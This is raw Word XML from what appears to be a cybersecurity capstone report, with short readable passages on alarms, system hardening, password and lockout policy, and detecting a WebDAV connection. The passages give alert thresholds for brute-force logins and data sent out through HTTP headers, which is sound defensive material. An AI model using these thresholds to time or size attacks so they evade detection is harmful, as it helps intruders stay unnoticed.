                              <a:gd name="T76" fmla="+- 0 4917 720"/>
                              <a:gd name="T77" fmla="*/ T76 w 4234"/>
                              <a:gd name="T78" fmla="+- 0 1265 551"/>
                              <a:gd name="T79" fmla="*/ 1265 h 841"/>
                              <a:gd name="T80" fmla="+- 0 4944 720"/>
                              <a:gd name="T81" fmla="*/ T80 w 4234"/>
                              <a:gd name="T82" fmla="+- 0 1226 551"/>
                              <a:gd name="T83" fmla="*/ 1226 h 841"/>
                              <a:gd name="T84" fmla="+- 0 4954 720"/>
                              <a:gd name="T85" fmla="*/ T84 w 4234"/>
                              <a:gd name="T86" fmla="+- 0 1177 551"/>
                              <a:gd name="T87" fmla="*/ 1177 h 841"/>
                              <a:gd name="T88" fmla="+- 0 4954 720"/>
                              <a:gd name="T89" fmla="*/ T88 w 4234"/>
                              <a:gd name="T90" fmla="+- 0 676 551"/>
                              <a:gd name="T91" fmla="*/ 676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3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7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5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294" y="751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="364" y="840"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="434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5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5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551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3B1C4" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="86"/>
                                <w:ind w:left="1523" w:right="1525"/>
                                <w:jc w:val="center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Alarm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9EF7A1" id="Group 36" o:spid="_x0000_s1086" style="position:absolute;margin-left:36pt;margin-top:27.55pt;width:211.7pt;height:42.05pt;z-index:-15690752;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="720,551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">
                <v:shape id="Freeform 38" o:spid="_x0000_s1087" style="position:absolute;left:720;top:551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" path="m4234,125l4213,56,4156,10,4108,,125,,76,10,37,37,10,77,,125,,626r10,49l37,714r39,27l125,751r169,l364,840r70,-89l4108,751r49,-10l4197,714r27,-39l4234,626r,-501xe" fillcolor="#3d85c6" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4234,676;4213,607;4156,561;4108,551;125,551;76,561;37,588;10,628;0,676;0,1177;10,1226;37,1265;76,1292;125,1302;294,1302;364,1391;434,1302;4108,1302;4157,1292;4197,1265;4224,1226;4234,1177;4234,676" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 37" o:spid="_x0000_s1088" type="#_x0000_t202" style="position:absolute;left:720;top:551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0143B1C4" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="86"/>
                          <w:ind w:left="1523" w:right="1525"/>
                          <w:jc w:val="center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Alarm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338ED59F" wp14:editId="175EF18D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4936490</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>352425</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2688590" cy="534035"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="4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7774" y="555"/>
                          <a:chExt cx="4234" cy="841"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="44" name="Freeform 35"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="7773" y="554"/>
                            <a:ext cx="4234" cy="841"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 12007 7774"/>
                              <a:gd name="T1" fmla="*/ T0 w 4234"/>
                              <a:gd name="T2" fmla="+- 0 680 555"/>
                              <a:gd name="T3" fmla="*/ 680 h 841"/>
                              <a:gd name="T4" fmla="+- 0 11986 7774"/>
                              <a:gd name="T5" fmla="*/ T4 w 4234"/>
                              <a:gd name="T6" fmla="+- 0 611 555"/>
                              <a:gd name="T7" fmla="*/ 611 h 841"/>
                              <a:gd name="T8" fmla="+- 0 11930 7774"/>
                              <a:gd name="T9" fmla="*/ T8 w 4234"/>
                              <a:gd name="T10" fmla="+- 0 564 555"/>
                              <a:gd name="T11" fmla="*/ 564 h 841"/>
                              <a:gd name="T12" fmla="+- 0 11882 7774"/>
                              <a:gd name="T13" fmla="*/ T12 w 4234"/>
                              <a:gd name="T14" fmla="+- 0 555 555"/>
                              <a:gd name="T15" fmla="*/ 555 h 841"/>
                              <a:gd name="T16" fmla="+- 0 7899 7774"/>
                              <a:gd name="T17" fmla="*/ T16 w 4234"/>
                              <a:gd name="T18" fmla="+- 0 555 555"/>
                              <a:gd name="T19" fmla="*/ 555 h 841"/>
                              <a:gd name="T20" fmla="+- 0 7850 7774"/>
                              <a:gd name="T21" fmla="*/ T20 w 4234"/>
                              <a:gd name="T22" fmla="+- 0 565 555"/>
                              <a:gd name="T23" fmla="*/ 565 h 841"/>
                              <a:gd name="T24" fmla="+- 0 7810 7774"/>
                              <a:gd name="T25" fmla="*/ T24 w 4234"/>
                              <a:gd name="T26" fmla="+- 0 592 555"/>
                              <a:gd name="T27" fmla="*/ 592 h 841"/>
                              <a:gd name="T28" fmla="+- 0 7783 7774"/>
                              <a:gd name="T29" fmla="*/ T28 w 4234"/>
                              <a:gd name="T30" fmla="+- 0 631 555"/>
                              <a:gd name="T31" fmla="*/ 631 h 841"/>
                              <a:gd name="T32" fmla="+- 0 7774 7774"/>
                              <a:gd name="T33" fmla="*/ T32 w 4234"/>
                              <a:gd name="T34" fmla="+- 0 680 555"/>
                              <a:gd name="T35" fmla="*/ 680 h 841"/>
                              <a:gd name="T36" fmla="+- 0 7774 7774"/>
                              <a:gd name="T37" fmla="*/ T36 w 4234"/>
                              <a:gd name="T38" fmla="+- 0 1180 555"/>
                              <a:gd name="T39" fmla="*/ 1180 h 841"/>
                              <a:gd name="T40" fmla="+- 0 7783 7774"/>
                              <a:gd name="T41" fmla="*/ T40 w 4234"/>
                              <a:gd name="T42" fmla="+- 0 1229 555"/>
                              <a:gd name="T43" fmla="*/ 1229 h 841"/>
                              <a:gd name="T44" fmla="+- 0 7810 7774"/>
                              <a:gd name="T45" fmla="*/ T44 w 4234"/>
                              <a:gd name="T46" fmla="+- 0 1269 555"/>
                              <a:gd name="T47" fmla="*/ 1269 h 841"/>
                              <a:gd name="T48" fmla="+- 0 7850 7774"/>
                              <a:gd name="T49" fmla="*/ T48 w 4234"/>
                              <a:gd name="T50" fmla="+- 0 1296 555"/>
                              <a:gd name="T51" fmla="*/ 1296 h 841"/>
                              <a:gd name="T52" fmla="+- 0 7899 7774"/>
                              <a:gd name="T53" fmla="*/ T52 w 4234"/>
                              <a:gd name="T54" fmla="+- 0 1306 555"/>
                              <a:gd name="T55" fmla="*/ 1306 h 841"/>
                              <a:gd name="T56" fmla="+- 0 8113 7774"/>
                              <a:gd name="T57" fmla="*/ T56 w 4234"/>
                              <a:gd name="T58" fmla="+- 0 1306 555"/>
                              <a:gd name="T59" fmla="*/ 1306 h 841"/>
                              <a:gd name="T60" fmla="+- 0 8194 7774"/>
                              <a:gd name="T61" fmla="*/ T60 w 4234"/>
                              <a:gd name="T62" fmla="+- 0 1395 555"/>
                              <a:gd name="T63" fmla="*/ 1395 h 841"/>
                              <a:gd name="T64" fmla="+- 0 8274 7774"/>
                              <a:gd name="T65" fmla="*/ T64 w 4234"/>
                              <a:gd name="T66" fmla="+- 0 1306 555"/>
                              <a:gd name="T67" fmla="*/ 1306 h 841"/>
                              <a:gd name="T68" fmla="+- 0 11882 7774"/>
                              <a:gd name="T69" fmla="*/ T68 w 4234"/>
                              <a:gd name="T70" fmla="+- 0 1306 555"/>
                              <a:gd name="T71" fmla="*/ 1306 h 841"/>
                              <a:gd name="T72" fmla="+- 0 11931 7774"/>
                              <a:gd name="T73" fmla="*/ T72 w 4234"/>
                              <a:gd name="T74" fmla="+- 0 1296 555"/>
                              <a:gd name="T75" fmla="*/ 1296 h 841"/>
                              <a:gd name="T76" fmla="+- 0 11971 7774"/>
                              <a:gd name="T77" fmla="*/ T76 w 4234"/>
                              <a:gd name="T78" fmla="+- 0 1269 555"/>
                              <a:gd name="T79" fmla="*/ 1269 h 841"/>
                              <a:gd name="T80" fmla="+- 0 11997 7774"/>
                              <a:gd name="T81" fmla="*/ T80 w 4234"/>
                              <a:gd name="T82" fmla="+- 0 1229 555"/>
                              <a:gd name="T83" fmla="*/ 1229 h 841"/>
                              <a:gd name="T84" fmla="+- 0 12007 7774"/>
                              <a:gd name="T85" fmla="*/ T84 w 4234"/>
                              <a:gd name="T86" fmla="+- 0 1180 555"/>
                              <a:gd name="T87" fmla="*/ 1180 h 841"/>
                              <a:gd name="T88" fmla="+- 0 12007 7774"/>
                              <a:gd name="T89" fmla="*/ T88 w 4234"/>
                              <a:gd name="T90" fmla="+- 0 680 555"/>
                              <a:gd name="T91" fmla="*/ 680 h 8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3" y="125"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4212" y="56"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4156" y="9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6" y="37"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9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5"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9" y="674"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="36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339" y="751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="420" y="840"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="500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3" y="674"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4233" y="625"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4233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7773" y="554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02DE4" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="86"/>
                                <w:ind w:left="423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System Hardening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8ED59F" id="Group 33" o:spid="_x0000_s1089" style="position:absolute;margin-left:388.7pt;margin-top:27.75pt;width:211.7pt;height:42.05pt;z-index:-15689728;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="7774,555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">
                <v:shape id="Freeform 35" o:spid="_x0000_s1090" style="position:absolute;left:7773;top:554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" path="m4233,125l4212,56,4156,9,4108,,125,,76,10,36,37,9,76,,125,,625r9,49l36,714r40,27l125,751r214,l420,840r80,-89l4108,751r49,-10l4197,714r26,-40l4233,625r,-500xe" fillcolor="#365b8a" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4233,680;4212,611;4156,564;4108,555;125,555;76,565;36,592;9,631;0,680;0,1180;9,1229;36,1269;76,1296;125,1306;339,1306;420,1395;500,1306;4108,1306;4157,1296;4197,1269;4223,1229;4233,1180;4233,680" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 34" o:spid="_x0000_s1091" type="#_x0000_t202" style="position:absolute;left:7773;top:554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41302DE4" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="86"/>
                          <w:ind w:left="423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System Hardening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050A882" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215D513B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="870"/>
          <w:tab w:val="left" w:pos="871"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="8274"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Set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4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>alert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trigger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alarm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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more</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>than</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>20000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>bits of information were sent to http headers within 11 minutes. (Can also use an alert if more than 10 Error401 were detected within a 15 second</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-28"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>interval)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1401FB49" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="107"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09A6119A" wp14:editId="42FDF672">
            <wp:extent cx="2937242" cy="2732817"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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242" cy="27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D180" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="3"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659ED4E5" w14:textId="3F4A7071" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="32" w:lineRule="exact"/>
        <w:ind w:left="144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23E4416B" wp14:editId="5EFA3184">
                <wp:extent cx="8605520" cy="20320"/>
                <wp:effectExtent l="2540" t="3175" r="2540" b="5080"/>
                <wp:docPr id="4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5520" cy="20320"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="13552" cy="32"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="42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3537" cy="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D83087" id="Group 31" o:spid="_x0000_s1026" style="width:677.6pt;height:1.6pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="1355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">
                <v:line id="Line 32" o:spid="_x0000_s1027" style="position:absolute;visibility:visible;mso-wrap-style:square" from="7,7" to="13544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" strokecolor="#a8b6bf"/>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="195A3447" w14:textId="2FE06254" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:spacing w:before="55"/>
        <w:ind w:left="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial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00256" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A27D72F" wp14:editId="5F2F2D0E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4584700</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-4180840</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3501390" cy="3927475"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="3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1390" cy="3927475"/>
                          <a:chOff x="7220" y="-6584"/>
                          <a:chExt cx="5514" cy="6185"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="37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9" y="-6584"/>
                            <a:ext cx="187" cy="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1" y="-4349"/>
                            <a:ext cx="5144" cy="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5" y="-2414"/>
                            <a:ext cx="5397" cy="2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7219" y="-6584"/>
                            <a:ext cx="5514" cy="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203EDE" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr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3B189534" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr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3920BB77" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial"/>
                                  <w:b/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="37C49A53" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr>
                                <w:spacing w:before="9"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="29"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="0C6130AE" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1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59"/>
                                  <w:tab w:val="left" w:pos="960"/>
                                </w:tabs>
                                <w:spacing w:line="276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windows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policy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settings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various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password strength rules: complex passwords, maximum</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:spacing w:val="-2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age</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="0795447A" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1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959"/>
                                  <w:tab w:val="left" w:pos="960"/>
                                </w:tabs>
                                <w:spacing w:line="276" w:lineRule="auto"/>
                                <w:ind w:right="22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Account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lockout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policies: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failed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logins,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30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min lockout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27D72F" id="Group 26" o:spid="_x0000_s1092" style="position:absolute;left:0;text-align:left;margin-left:361pt;margin-top:-329.2pt;width:275.7pt;height:309.25pt;z-index:-16116224;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="7220,-6584" coordsize="5514,61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">
                <v:shape id="Picture 30" o:spid="_x0000_s1093" type="#_x0000_t75" style="position:absolute;left:7219;top:-6584;width:187;height:6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">
                  <v:imagedata r:id="rId56" o:title=""/>
                </v:shape>
                <v:shape id="Picture 29" o:spid="_x0000_s1094" type="#_x0000_t75" style="position:absolute;left:7391;top:-4349;width:5144;height:1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">
                  <v:imagedata r:id="rId62" o:title=""/>
                </v:shape>
                <v:shape id="Picture 28" o:spid="_x0000_s1095" type="#_x0000_t75" style="position:absolute;left:7265;top:-2414;width:5397;height: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">
                  <v:imagedata r:id="rId63" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 27" o:spid="_x0000_s1096" type="#_x0000_t202" style="position:absolute;left:7219;top:-6584;width:5514;height:6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47203EDE" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial"/>
                            <w:b/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="3B189534" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial"/>
                            <w:b/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="3920BB77" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial"/>
                            <w:b/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="37C49A53" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:spacing w:before="9"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial"/>
                            <w:b/>
                            <w:sz w:val="29"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="0C6130AE" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1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59"/>
                            <w:tab w:val="left" w:pos="960"/>
                          </w:tabs>
                          <w:spacing w:line="276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windows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policy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settings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create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various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password strength rules: complex passwords, maximum</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:spacing w:val="-2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age</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0795447A" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1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959"/>
                            <w:tab w:val="left" w:pos="960"/>
                          </w:tabs>
                          <w:spacing w:line="276" w:lineRule="auto"/>
                          <w:ind w:right="22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Account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lockout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policies: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10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failed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logins,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30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min lockout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B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>Note since capstone machine does not have a GUI; password policies should be configured in the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>accounts.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34944E87" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="14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38955681" w14:textId="5CB40DAA" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:right="28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28800" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="157705D6" wp14:editId="4ACAAF4E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35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F8C445" id="Line 25" o:spid="_x0000_s1026" style="position:absolute;z-index:-15687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" strokecolor="#595959">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:t>Mitigation: Detecting the WebDAV Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542454F3" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10DBD010" w14:textId="7EFF642D" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7493"/>
        </w:tabs>
        <w:ind w:left="440"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pP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12279B77" wp14:editId="6929ADDA">
                <wp:extent cx="2688590" cy="534035"/>
                <wp:effectExtent l="0" t="6985" r="6985" b="1905"/>
                <wp:docPr id="3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0" y="0"/>
                          <a:chExt cx="4234" cy="841"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="33" name="Freeform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custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T1" fmla="*/ 125 h 841"/>
                              <a:gd name="T2" fmla="*/ 4213 w 4234"/>
                              <a:gd name="T3" fmla="*/ 56 h 841"/>
                              <a:gd name="T4" fmla="*/ 4156 w 4234"/>
                              <a:gd name="T5" fmla="*/ 10 h 841"/>
                              <a:gd name="T6" fmla="*/ 4108 w 4234"/>
                              <a:gd name="T7" fmla="*/ 0 h 841"/>
                              <a:gd name="T8" fmla="*/ 125 w 4234"/>
                              <a:gd name="T9" fmla="*/ 0 h 841"/>
                              <a:gd name="T10" fmla="*/ 76 w 4234"/>
                              <a:gd name="T11" fmla="*/ 10 h 841"/>
                              <a:gd name="T12" fmla="*/ 37 w 4234"/>
                              <a:gd name="T13" fmla="*/ 37 h 841"/>
                              <a:gd name="T14" fmla="*/ 10 w 4234"/>
                              <a:gd name="T15" fmla="*/ 76 h 841"/>
                              <a:gd name="T16" fmla="*/ 0 w 4234"/>
                              <a:gd name="T17" fmla="*/ 125 h 841"/>
                              <a:gd name="T18" fmla="*/ 0 w 4234"/>
                              <a:gd name="T19" fmla="*/ 626 h 841"/>
                              <a:gd name="T20" fmla="*/ 10 w 4234"/>
                              <a:gd name="T21" fmla="*/ 674 h 841"/>
                              <a:gd name="T22" fmla="*/ 37 w 4234"/>
                              <a:gd name="T23" fmla="*/ 714 h 841"/>
                              <a:gd name="T24" fmla="*/ 76 w 4234"/>
                              <a:gd name="T25" fmla="*/ 741 h 841"/>
                              <a:gd name="T26" fmla="*/ 125 w 4234"/>
                              <a:gd name="T27" fmla="*/ 751 h 841"/>
                              <a:gd name="T28" fmla="*/ 294 w 4234"/>
                              <a:gd name="T29" fmla="*/ 751 h 841"/>
                              <a:gd name="T30" fmla="*/ 364 w 4234"/>
                              <a:gd name="T31" fmla="*/ 840 h 841"/>
                              <a:gd name="T32" fmla="*/ 434 w 4234"/>
                              <a:gd name="T33" fmla="*/ 751 h 841"/>
                              <a:gd name="T34" fmla="*/ 4108 w 4234"/>
                              <a:gd name="T35" fmla="*/ 751 h 841"/>
                              <a:gd name="T36" fmla="*/ 4157 w 4234"/>
                              <a:gd name="T37" fmla="*/ 741 h 841"/>
                              <a:gd name="T38" fmla="*/ 4197 w 4234"/>
                              <a:gd name="T39" fmla="*/ 714 h 841"/>
                              <a:gd name="T40" fmla="*/ 4224 w 4234"/>
                              <a:gd name="T41" fmla="*/ 674 h 841"/>
                              <a:gd name="T42" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T43" fmla="*/ 626 h 841"/>
                              <a:gd name="T44" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T45" fmla="*/ 125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3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4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294" y="751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="364" y="840"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="434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4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5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4888F1" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="86"/>
                                <w:ind w:left="1523" w:right="1525"/>
                                <w:jc w:val="center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Alarm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279B77" id="Group 22" o:spid="_x0000_s1097" style="width:211.7pt;height:42.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line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">
                <v:shape id="Freeform 24" o:spid="_x0000_s1098" style="position:absolute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" path="m4234,125l4213,56,4156,10,4108,,125,,76,10,37,37,10,76,,125,,626r10,48l37,714r39,27l125,751r169,l364,840r70,-89l4108,751r49,-10l4197,714r27,-40l4234,626r,-501xe" fillcolor="#3d85c6" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4234,125;4213,56;4156,10;4108,0;125,0;76,10;37,37;10,76;0,125;0,626;10,674;37,714;76,741;125,751;294,751;364,840;434,751;4108,751;4157,741;4197,714;4224,674;4234,626;4234,125" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 23" o:spid="_x0000_s1099" type="#_x0000_t202" style="position:absolute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734888F1" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="86"/>
                          <w:ind w:left="1523" w:right="1525"/>
                          <w:jc w:val="center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Alarm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6B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
        <w:tab/>
      </w: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23D9CB31" wp14:editId="3C995C18">
                <wp:extent cx="2688590" cy="534035"/>
                <wp:effectExtent l="1905" t="6985" r="5080" b="1905"/>
                <wp:docPr id="2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0" y="0"/>
                          <a:chExt cx="4234" cy="841"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="30" name="Freeform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custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T1" fmla="*/ 125 h 841"/>
                              <a:gd name="T2" fmla="*/ 4212 w 4234"/>
                              <a:gd name="T3" fmla="*/ 56 h 841"/>
                              <a:gd name="T4" fmla="*/ 4156 w 4234"/>
                              <a:gd name="T5" fmla="*/ 10 h 841"/>
                              <a:gd name="T6" fmla="*/ 4108 w 4234"/>
                              <a:gd name="T7" fmla="*/ 0 h 841"/>
